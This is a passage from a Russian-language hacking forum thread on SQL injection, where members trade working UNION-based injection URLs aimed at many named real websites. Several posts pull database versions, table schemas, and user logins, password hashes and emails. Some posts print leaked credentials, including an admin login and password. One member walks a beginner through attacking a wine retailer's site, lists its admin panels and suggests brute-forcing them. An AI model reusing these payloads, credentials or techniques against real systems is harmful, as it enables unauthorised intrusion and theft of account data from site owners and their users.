Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor


SQL-injection


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 96

#76
xUnu

xUnu

    Байт

  • Members
  • Pip
  • 65 сообщений

[COLOR=White]
O_o

#77
xUnu

xUnu

    Байт

  • Members
  • Pip
  • 65 сообщений
Аэропорт кольцова:::

_ koltsovo@localhost***koltsovo***5.0.27
Таблы

Далее

[COLOR=White]
O_o

#78
xUnu

xUnu

    Байт

  • Members
  • Pip
  • 65 сообщений

_netutk@localhost***netutk***4.0.24-log
[COLOR=White]
O_o

#79
xUnu

xUnu

    Байт

  • Members
  • Pip
  • 65 сообщений
SQL -



4b117e26ba0fd7e082474e4890a85452:boris26U


0404b733bb20f1593b10914a5b865e60:wilde54
--------------------------------------------------------------------------

http://www.geneticsandsociety.org/article.php?id=305+unION+aLL+seLECT+coNCAT_ws(chAR(42,42,42),0x3a,user(),database(),version())+from+users
***genetics@sadie***genetics***4.1.21-standard-log
я нашел таблицу users --- первый раз вижу такую скулю:)
[COLOR=White]
O_o

#80
Cлоны_они_повсюду

Cлоны_они_повсюду

    Бит

  • Members
  • 33 сообщений
http://www.informarket.ru/index.php?p_id=-15+union+select+concat_ws(0x3a,table_name,column_name),2,3,4,5,6,7,8,9,10+from+information_schema.columns+limit+1,1000--

http://www.ccfrussia.ru/index.php?mod=p_article&p_id=-210+union+select+1,2,3,4,5,version(),7,8,9,10,12,13,14--

http://www.savatouristik.ru/index.php?toid=-3+union+select+1,version()--

http://www.ocenter.ru/index.php?id=files&action=show&a=-62+union+select+1,version(),3,4,5,6,7,8--

http://games.tvercity.ru/?id=articles&action=show&a=-62+union+select+1,version(),3,4,5,6,7,8--

http://bolashak.kz/?type=news&id=-117+union+select+1,2,3,version(),5,6,7,8--

http://sluganaroda.ru/index.php?action=news&mode=news&mode=full&id=-33+union+select+1,2,3,4,version()--

http://www.tltinfo.ru/law/index.php?id=-834+union+select+1,2,3,4,5,6,7,version()--

http://www.1radio.ru/?app=&file=aticles&do=one&id=-32+union+select+1,2,version(),4,5,6--

http://www.thod.org/content.php3?id=-31+union+select+1,2,3,4,version(),6,7--

http://shirleyofhollywood.ru/cat.php?id=-10+union+select+version(),2--

http://www.electrobud.com.ua/index.php?menu=tree&idtree=-1+union+select+1,2,version(),4,5,6--

http://www.1radio.ru/?app=&file=news&do=one&news=-40+union+select+1,2,3,version(),5,6,7,8--


#81
Cлоны_они_повсюду

Cлоны_они_повсюду

    Бит

  • Members
  • 33 сообщений
http://www.f1-world.ru/drivers/drvinfo.php3?id=-1199701021+union+select+1,concat_ws(0x3a3a,NickName,PassWd,Email,ICQ),3,4,5,6,7,8,9,10+from+fusers+limit+1,10000--


http://www.f1-world.ru/drivers/drvinfo.php3?id=-1199701021+union+select+1,concat_ws(0x3a,table_name,column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+limit+1,10000--


#82
legion2k

legion2k

    Бит

  • Members
  • 37 сообщений
hxxp://www.dofus.us/list.php?id=9999999+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6

hxxp://www.dofus.us/list.php?id=9999999+union+select+1,2,group_concat(table_name),4,5,6+from+information_schema.tables

hxxp://www.dofus.us/list.php?id=9999999+union+select+1,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=0x7361646d696e

hxxp://www.dofus.us/list.php?id=9999999+union+select+1,2,concat_ws(0x3a,id,usname,paswd),4,5,6+from+sadmin

hxxp://pro-us-game.com/vov_levelpack_add_.php?id=-9_99+union+select+1,2,3,version(),5,6,user(),8,database(),10,11,12

hxxp://www.x-race.it/shop.php?id=-23+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5

hxxp://syspay.info/article.php?id=-13+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6

hxxp://www.w2wventures.com/education/articles/index.php?id=-164+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,8,9,10,11

hxxp://www.nhia.edu/calendar.php?id=-430+union+select+1,2,3,unhex(hex(concat_ws(0x3a,version(),database(),user()))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,
23,24,25,26


#83
Cлоны_они_повсюду

Cлоны_они_повсюду

    Бит

  • Members
  • 33 сообщений
Большой список таблиц
 
http://stroyvariant.ru/?page=katr&id=-1002+union+select+1,2,concat_ws(0x3a,table_name,column_name),4,5+from+information_schema.columns+limit+1,1000--

]]>список сайтов к которым подходят пароли из бд]]>
все админки находятся по адресу http:\\[site]\admin.php

первый раз вижу чтобы такое количество сайтов было в одной бд

список таблиц
 
http://www.stplus.ru/partners.php?type_p=3+union+select+1,2,3,concat_ws(0x3a,table_name,column_name),5,6,7,8,9,10+from+information_schema.columns+limit+1,1000/*

логин пароль админа
stp_master:a3xx-100

админку так найти и несмог =)) может вам повезёт !!!!

#84
seomoneys

seomoneys

    Бит

  • Members
  • 2 сообщений

Цитата

ХТТП://www.comap.com/product/?idx=-123928+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex(hex(concat_ws(0x3a,user(),version()
,database()))),18,19,20,21,22,23,24,25,26,27,28,29,30,31--+


#85
Cлоны_они_повсюду

Cлоны_они_повсюду

    Бит

  • Members
  • 33 сообщений
 
http://www.padangkini.com/berita/single.php?id=4556+union+select+1,2,3,concat_ws(0x3a3a,username,password,email),5,6,7,8,9,10+from+%20users+limit+1,1000--

http://www.padangkini.com/login/


#86
xUnu

xUnu

    Байт

  • Members
  • Pip
  • 65 сообщений
http://www.universpain.com/Russian/view-links.php?id=1/**/aNd/**/substring(version(),1,1)=5%20+--+
http://www.barroecor.com.br/cor.php?id=-1/**/uNiON+aLL/**/seLECT/**/1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,version(),user(),database()),0x71),0x71),3,4
http://www.improvisedmusic.ie/links.php?id=-1/**/uniON/**/AlL/**/SELeCT/**/1,2,version(),4,5%20+--+
http://www.improvisedmusic.ie/links.php?id=-1/**/uniON/**/AlL/**/SELeCT/**/1,2,coNCAt(user_email,0x3a,user_pass,0x3a,user_firstname,0x3a,user_firstname),4,5/**/FROM/**/user/**/limit/**/0,1+--+
http://www.universpain.com/Russian/view-links.php?id=1/**/aNd/**/substring(version(),1,1)=5%20+--+
http://www.webclutter.com/links.php?id=1/**/aNd/**/substring(version(),1,1)=5%20+--+
http://www.spacebucket.com/links.php?id=-1/**/uniON/**/AlL/**/SELeCT/**/1,user(),version(),database(),5,6/*

[COLOR=White]
O_o

#87
liv

liv

    Бит

  • Banned
  • 2 сообщений
]]>http://www.rdu.org.u...version(),3,4/*]]>
]]>http://www.gse.upenn...4,version(),6/*]]>
]]>http://www.nhia.edu/...0,21,22,23,24/*]]>
]]>http://gopanthers.fi...elect 1,2,3,4/*]]>

#88
Cлоны_они_повсюду

Cлоны_они_повсюду

    Бит

  • Members
  • 33 сообщений
_http://umnaymama.ru/admin/catalogshow.php?show=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,table_name,column_name),8,9,10+from+information_schema.co
lumns+limit+1,1000--



_http://webdoski.ru/show.php?sn=-149+union+select+1,concat_ws(0x3a3a,login,password,email)+from+users+limit+1,1000--



P.S Форум мёртв ?

#89
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений

Цитата

P.S Форум мёртв ?
Нет. жив.

#90
Jaba

Jaba

    Бит

  • Members
  • 5 сообщений
подскажите я только начал изучать инъекции, вот что мне делать дальше  

]]>http://www.winekitz....from mysql.user]]>

какое отрицательное ??в столбе

#91
Jaba

Jaba

    Бит

  • Members
  • 5 сообщений
А вот еще,не понимаю как вычислить столбцы ]]>http://piterphone.ru...ews.php?cat=1'']]> ??

#92
Jaba

Jaba

    Бит

  • Members
  • 5 сообщений
где все доктора???

#93
DarckSol

DarckSol

    Байт

  • Extended
  • Pip
  • 95 сообщений

Просмотр сообщенияJaba (10.1.2010, 8:04) писал:

подскажите я только начал изучать инъекции, вот что мне делать дальше  

]]>http://www.winekitz....from mysql.user]]>

какое отрицательное ??в столбе
http://www.winekitz.com/index.php?id=9999+union+select+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
User:yourcms_lynch
BD:yourcms_db
Version Sql:4.1.22-standard
Купи VDS за 150 рублей в месяц.
Продаю ключи активация от продуктов Microsoft ©
Важно: Проводя сделку  УБЕДИСЬ в чистоте своего партнера/собеседника на причастие к "КИДАЛОВО/ОБМАНУ"
..:ICQ 335~949~335:..
<<Jabber: [email protected]<script data-cfhash='f9e31' type="text/javascript">/* */</script>, [email protected]>>

Изображение

#94
Jaba

Jaba

    Бит

  • Members
  • 5 сообщений
так это же не админка!!((

а где мне пароль искать???

#95
DarckSol

DarckSol

    Байт

  • Extended
  • Pip
  • 95 сообщений
Page Found: ]]>http://www.winekitz.com/admin/]]>
Page Found: ]]>http://www.winekitz.com/login.php]]>
Page Found: ]]>http://www.winekitz.com/manager/]]>
Page Found: ]]>http://www.winekitz.com/controlpanel/]]>
Page Found: ]]>http://www.winekitz.com/cpanel/]]>
Page Found: ]]>http://www.winekitz.com/kpanel/]]>
Найдены мной панели управления...
3 последних управления хостингом... там cPanel
3 первыйх для управления сайтом, пароли искать в базе данных, база 4, брутить названия ручками....
Для расширения кругозора и понимания происходящего советую почитать тут ]]>http://pro-hack.ru/f...?showtopic=6217]]>
Купи VDS за 150 рублей в месяц.
Продаю ключи активация от продуктов Microsoft ©
Важно: Проводя сделку  УБЕДИСЬ в чистоте своего партнера/собеседника на причастие к "КИДАЛОВО/ОБМАНУ"
..:ICQ 335~949~335:..
<<Jabber: [email protected]<script data-cfhash='f9e31' type="text/javascript">/* */</script>, [email protected]>>

Изображение

#96
4NearU4

4NearU4

    Байт

  • Members
  • Pip
  • 84 сообщений
manager......


]]>http://www.winekitz....nstructions.txt]]>


можно поржать почитать=)
не знаешь с чего начать?что делать? помогу, спамить в личку.

#97
AFoST

AFoST

    тапочег с вишней

  • Moderator
  • PipPip
  • 256 сообщений


 


Количество пользователей, читающих эту тему: 1

0 пользователей, 1 гостей, 0 анонимных